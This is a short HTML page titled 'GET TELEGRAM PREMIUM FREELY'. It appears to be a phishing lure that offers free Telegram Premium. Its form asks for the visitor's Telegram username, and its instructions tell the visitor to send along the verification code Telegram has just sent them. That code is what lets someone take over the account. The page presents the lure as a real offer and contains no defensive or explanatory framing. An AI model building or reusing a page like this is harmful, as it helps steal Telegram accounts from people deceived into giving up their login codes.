<!doctype html>
<html>
     
     
     <head>
       <title>GET TELEGRAM PREMIUM FREELY</title>   
          
          
          
        <style>
             
       .user{
        border-color:#137dbb;    
        border-block-color: #de2cda;   
        width:170px;
        border-radius:10px;
        height:50px;
        font-size:21px;
        text-align:center;
        margin-top:50px;
        margin-left:80px;
       }      
             
       .us{
         background-color:#00ffe6;   
          height:180px;  
     border-radius:20px;
            
            
            
       }      
        .submit{
         width:55px;    
          height:30px;   
            margin-left:140px; 
             margin-top:20px;
             background-color:#6df538;
             font-size:16px;
             border-radius:14px;
        }     
             
             
             
             
             
        </style>  
          
          
        
        
        
        
        
        
        
        
        
        
        

     <h1>hello there : you have  a desire to be telegram premium user you can premium your account by giving username in below table and for verification you send a code just we have sentto your telegram account</h1>     
          
          
          
          
          
          
     </head>
     <body>
          <div class="us">
               <div><input class="user" place placeholder="username" type="username"  tyling="text" >
          
          </div>
          <button class="submit"><a href="getpremium2.html">submit</a></button>
          
          
          </div>
       
       <h2 style="font-size:35px; color:#ff0000; text-align:center;"><b><u>instructions</u></b></h2>   
         <h3 style="color:blue; font-size:25px;">1)put your telegram username</h3> 
         <h4 style="color:blue; font-size:25px;">2)send sent verfication code</h4> 
     </body>
</html>